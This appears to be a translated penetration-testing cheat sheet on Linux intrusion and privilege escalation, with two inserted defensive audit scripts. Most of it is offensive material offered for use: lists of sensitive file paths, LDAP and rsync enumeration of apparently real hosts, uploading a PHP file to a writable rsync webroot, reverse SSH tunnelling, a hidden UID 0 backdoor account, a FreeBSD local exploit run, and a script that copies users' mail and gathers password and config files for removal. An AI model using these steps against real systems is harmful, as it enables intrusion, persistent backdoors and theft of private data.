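Linux Penetration and Privilege Escalation Summary

This article summarizes Linux penetration and privilege escalation techniques. It collects a range of Linux penetration techniques and privilege escalation cases so that readers can work more efficiently in future penetration tests.

Some common paths on Linux systems: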

/etc/passwd
/etc/shadow
/etc/fstab
/etc/host.conf
/etc/motd
/etc/ld.so.conf
/var/www/htdocs/index.php
/var/www/conf/httpd.conf
/var/www/htdocs/index.html
/var/httpd/conf/php.ini
/var/httpd/htdocs/index.php
/var/httpd/conf/httpd.conf
/var/httpd/htdocs/index.html
/var/httpd/conf/php.ini
/var/www/index.html
/var/www/index.php
/opt/www/conf/httpd.conf
/opt/www/htdocs/index.php
/opt/www/htdocs/index.html
/usr/local/apache/htdocs/index.html
/usr/local/apache/htdocs/index.php
/usr/local/apache2/htdocs/index.html
/usr/local/apache2/htdocs/index.php
/usr/local/httpd2.2/htdocs/index.php
/usr/local/httpd2.2/htdocs/index.html
/tmp/apache/htdocs/index.html
/tmp/apache/htdocs/index.php
/etc/httpd/htdocs/index.php
/etc/httpd/conf/httpd.conf
/etc/httpd/htdocs/index.html
/www/php/php.ini
/www/php4/php.ini
/www/php5/php.ini
/www/conf/httpd.conf
/www/htdocs/index.php
/www/htdocs/index.html
/usr/local/httpd/conf/httpd.conf
/apache/apache/conf/httpd.conf
/apache/apache2/conf/httpd.conf
/etc/apache/apache.conf
/etc/apache2/apache.conf
/etc/apache/httpd.conf
/etc/apache2/httpd.conf
/etc/apache2/vhosts.d/00_default_vhost.conf
/etc/apache2/sites-available/default
/etc/phpmyadmin/config.inc.php
/etc/mysql/my.cnf
/etc/httpd/conf.d/php.conf
/etc/httpd/conf.d/httpd.conf
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/home/apache/conf/httpd.conf
/home/apache2/conf/httpd.conf
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache2/access_log
/var/log/apache2/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/error_log
/var/log/error.log
/var/log/access_log
/var/log/access.log
/usr/local/apache/logs/access_logaccess_log.old
/usr/local/apache/logs/error_logerror_log.old
/etc/php.ini
/bin/php.ini
/etc/init.d/httpd
/etc/init.d/mysql
/etc/httpd/php.ini
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/local/etc/php.ini
/usr/local/lib/php.ini
/usr/local/php/lib/php.ini
/usr/local/php4/lib/php.ini
/usr/local/php4/php.ini
/usr/local/php4/lib/php.ini
/usr/local/php5/lib/php.ini
/usr/local/php5/etc/php.ini
/usr/local/php5/php5.ini
/usr/local/apache/conf/php.ini
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
/etc/php/php.ini
/etc/php/php4/php.ini
/etc/php/apache/php.ini
/etc/php/apache2/php.ini
/web/conf/php.ini
/usr/local/Zend/etc/php.ini
/opt/xampp/etc/php.ini
/var/local/www/conf/php.ini
/var/local/www/conf/httpd.conf
/etc/php/cgi/php.ini
/etc/php4/cgi/php.ini
/etc/php5/cgi/php.ini
/php5/php.ini
/php4/php.ini
/php/php.ini
/PHP/php.ini
/apache/php/php.ini
/xampp/apache/bin/php.ini
/xampp/apache/conf/httpd.conf
/NetServer/bin/stable/apache/php.ini
/home2/bin/stable/apache/php.ini
/home/bin/stable/apache/php.ini
/var/log/mysql/mysql-bin.log
/var/log/mysql.log
/var/log/mysqlderror.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/mysql.log
/var/lib/mysql/my.cnf
/usr/local/mysql/my.cnf
/usr/local/mysql/bin/mysql
/etc/mysql/my.cnf
/etc/my.cnf
/usr/local/cpanel/logs
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
/usr/local/share/examples/php4/php.ini
/usr/local/share/examples/php/php.ini
/usr/local/tomcat5527/bin/version.sh
/usr/share/tomcat6/bin/startup.sh
/usr/tomcat6/bin/startup.sh

Linux privilege escalation and penetration techniques, Part 1: LDAP penetration techniques:

1. cat /etc/nsswitch.conf

Check the password/login lookup policy; here we can see that the "files ldap" mode is in use.

2. less /etc/ldap.conf

base ou=People,dc=unix-center,dc=net

Find the ou, dc, dc settings.

3. Look up administrator information

Anonymous:

ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

With a password:

ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

4. Fetch 10 user records

ldapsearch -h 192.168.2.2 -x -z 10 -p <port>

Penetration in practice:

1. Return all attributes

ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"
version: 1

dn: dc=ruc,dc=edu,dc=cn
dc: ruc
objectClass: domain

dn: uid=manager,dc=ruc,dc=edu,dc=cn
uid: manager
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
sn: manager
cn: manager

dn: uid=superadmin,dc=ruc,dc=edu,dc=cn
uid: superadmin
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
sn: superadmin
cn: superadmin

dn: uid=admin,dc=ruc,dc=edu,dc=cn
uid: admin
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
sn: admin
cn: admin

dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
uid: dcp_anonymous
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: inetOrgPerson
sn: dcp_anonymous
cn: dcp_anonymous

2. View the base entry

bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" | more
version: 1
dn: dc=ruc,dc=edu,dc=cn
dc: ruc
objectClass: domain

3. Search

bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"
version: 1
dn:
objectClass: top
namingContexts: dc=ruc,dc=edu,dc=cn
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 2
supportedLDAPVersion: 3
vendorName: Sun Microsystems, Inc.
vendorVersion: Sun-Java(tm)-System-Directory/6.2
dataversion: 020090516011411
netscapemdsuffix: cn=ldap://dc=webA:389

Linux privilege escalation and penetration techniques, Part 2: NFS penetration techniques:

List the exports of an IP:

showmount -e ip

Linux privilege escalation and penetration techniques, Part 3: rsync penetration techniques:

1. List the modules on the rsync server:

rsync 210.51.X.X::
finance
img_finance
auto
img_auto
html_cms
img_cms
ent_cms
ent_img
ceshi
res_img
res_img_c2
chip
chip_c2
ent_icms
games
gamesimg
media
mediaimg
fashion
res-fashion
res-fo
taobao-home
res-taobao-home
house
res-house
res-home
res-edu
res-ent
res-labs
res-news
res-phtv
res-media
home
edu
news
res-book

View the corresponding subdirectories (note: the directory name must be followed by a trailing /):

rsync 210.51.X.X::htdocs_app/
rsync 210.51.X.X::auto/
rsync 210.51.X.X::edu/

2. Download the configuration files from the rsync server

rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/

3. Push a file up to the rsync server (the upload succeeds and does not overwrite existing files)

rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
http://app.finance.xxx.com/warn/nothack.txt
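
Seen from the server side, each rsync step above depends on a module that has no "auth users", no "hosts allow" and, for the upload, "read only = no". The script below is an added example, not part of the original article: it audits an rsyncd.conf for those settings. The sample config, its paths and the "backup" module are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original page): audit an rsyncd.conf for modules
# that permit the unauthenticated list/download/upload shown above.

# Constructed sample config; module names and paths are illustrative only.
write_sample_conf() {
    cat > "$1" <<'EOF'
# global section: defaults inherited by every module
uid = nobody
use chroot = yes

[htdocs_app]
path = /data/htdocs_app
read only = no

[backup]
path = /data/backup
read only = yes
list = no
auth users = backupsvc
secrets file = /etc/rsyncd.secrets
hosts allow = 10.0.0.0/24
EOF
}

# Print one "<module>: <finding>" line per weak setting in the file "$1".
audit_rsyncd_conf() {
    awk '
    function trim(s) { gsub(/^[ \t]+|[ \t]+$/, "", s); return s }
    function is_false(v) { v = tolower(v); return v == "no" || v == "false" || v == "0" }
    function report() {
        if (mod == "") return
        if (p["auth users"] == "")    print mod ": anonymous access (no auth users)"
        if (p["hosts allow"] == "")   print mod ": reachable from any host (no hosts allow)"
        if (is_false(p["read only"])) print mod ": writable (read only = " p["read only"] ")"
        if (!is_false(p["list"]))     print mod ": advertised in module listing"
    }
    /^[ \t]*([#;]|$)/ { next }                     # skip comments and blank lines
    /^[ \t]*\[/ {                                  # [module] header starts a new section
        report()
        mod = $0; sub(/^[ \t]*\[/, "", mod); sub(/\].*$/, "", mod)
        split("", p); for (k in g) p[k] = g[k]     # start from the global defaults
        next
    }
    {
        eq = index($0, "="); if (eq == 0) next
        key = tolower(trim(substr($0, 1, eq - 1))); val = trim(substr($0, eq + 1))
        if (mod == "") g[key] = val; else p[key] = val
    }
    END { report() }
    ' "$1"
}

conf=$(mktemp) && write_sample_conf "$conf" && audit_rsyncd_conf "$conf"
rm -f "$conf"
```

On the constructed sample only the htdocs_app module is reported; the backup module, which sets auth users, hosts allow and list = no and keeps read only = yes, produces no findings.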

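Linux privilege escalation and penetration techniques, Part 4: Squid penetration techniques:

nc -vv 91ri.org 80
GET HTTP://www.sina.com/ HTTP/1.0
GET HTTP://WWW.sina.com:22/ HTTP/1.0

Linux privilege escalation and penetration techniques, Part 5: SSH port forwarding:

ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip

Linux privilege escalation and penetration techniques, Part 6: Joomla penetration tips:

Determine the version:

index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47

Reset the password:

index.php?option=com_user&view=reset&layout=confirm

Linux privilege escalation and penetration techniques, Part 7: Adding a root user with UID 0 on Linux:

useradd -o -u 0 nothack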
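
An account added this way shares UID 0 with root, so it appears in /etc/passwd as a second name for the same UID. The script below is an added example, not part of the original article: it flags non-root UID 0 accounts and any other shared UIDs in a passwd-format file. The sample entries are constructed.

```shell
#!/bin/sh
# Added example (not from the original page): detect accounts created with a
# non-unique UID, including extra UID 0 accounts, in a passwd-format file.

# Constructed sample; "nothack" mirrors the account name used above.
write_sample_passwd() {
    cat > "$1" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000::/home/alice:/bin/bash
svc:x:1000:1000::/home/svc:/bin/sh
nothack:x:0:0::/home/nothack:/bin/bash
EOF
}

# Print "UID0 <name>" for every non-root account with UID 0, then
# "SHARED <uid> <name,name,...>" for every UID owned by more than one name.
audit_passwd_uids() {
    awk -F: '
    /^[ \t]*(#|$)/ { next }                        # skip comments and blank lines
    {
        if ($3 ~ /^0+$/ && $1 != "root") print "UID0 " $1
        names[$3] = (names[$3] == "" ? $1 : names[$3] "," $1)
        count[$3]++
        if (!($3 in seen)) { seen[$3] = 1; uid[++n] = $3 }   # keep first-seen order
    }
    END {
        for (i = 1; i <= n; i++)
            if (count[uid[i]] > 1) print "SHARED " uid[i] " " names[uid[i]]
    }
    ' "$1"
}

f=$(mktemp) && write_sample_passwd "$f" && audit_passwd_uids "$f"
rm -f "$f"
```

Run it against /etc/passwd on a schedule and alert on any output; a clean system normally prints nothing.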

Linux privilege escalation and penetration techniques, Part 8: FreeBSD local privilege escalation:

[argp@julius ~]$ uname -rsi
freebsd 7.3-RELEASE GENERIC
[argp@julius ~]$ sysctl vfs.usermount
vfs.usermount: 1
[argp@julius ~]$ id
uid=1001(argp) gid=1001(argp) groups=1001(argp)
[argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
[argp@julius ~]$ ./nfs_mount_ex

calling nmount()

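Packing a directory with tar:

1. Packing with tar:

# --exclude='*.gif' excludes files; --exclude='/xx/xx/*' excludes a directory
tar -cvf /home/public_html/*.tar --exclude='*.gif' --exclude='/xx/xx/*' /home/public_html/

Packing with alzip (Korean): alzip -a D:\WEB d:\web*.rar

{

Note:

On packing with tar: Linux does not use the file extension to determine the file type.

For compressed archives, tar -ztf *.tar.gz lists the contents of the archive and tar -zxf *.tar.gz extracts it.

In that case this command is the better choice:

# --exclude='*.gif' excludes files; --exclude='/xx/xx/*' excludes a directory
tar -czf /home/public_html/*.tar.gz --exclude='*.gif' --exclude='/xx/xx/*' /home/public_html/

}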

System information gathering:

For Linux:

#!/bin/bash
echo "#######getting sysinfo####"
echo "######usage: ./getinfo.sh >/tmp/sysinfo.txt"
echo "#######basic information##"
# memory, CPU and installed packages
cat /proc/meminfo
echo
cat /proc/cpuinfo
echo
rpm -qa 2>/dev/null
######stole the mail......######
cp -a /var/mail /tmp/getmail 2>/dev/null
echo "u r id is $(id)"
echo "###atq&crontab#####"
atq
crontab -l
echo "#####about var#####"
set
echo "#####about network###"
####this is the point in pentest, but I am a newbie, so you need to add some in it
cat /etc/hosts
hostname
ifconfig -a
arp -v
echo "########user####"
cat /etc/passwd|grep -i sh
echo "######service####"
chkconfig --list
# look for service accounts in /etc/passwd
for i in {oracle,mysql,tomcat,samba,apache,ftp}
do
    cat /etc/passwd|grep -i "$i"
done
locate passwd >/tmp/password 2>/dev/null
sleep 5
locate password >>/tmp/password 2>/dev/null
sleep 5
locate conf >/tmp/sysconfig 2>/dev/null
sleep 5
locate config >>/tmp/sysconfig 2>/dev/null
sleep 5
###maybe can use "tree /"###
echo "##packing up#########"
tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
rm -rf /tmp/getmail /tmp/password /tmp/sysconfig
 
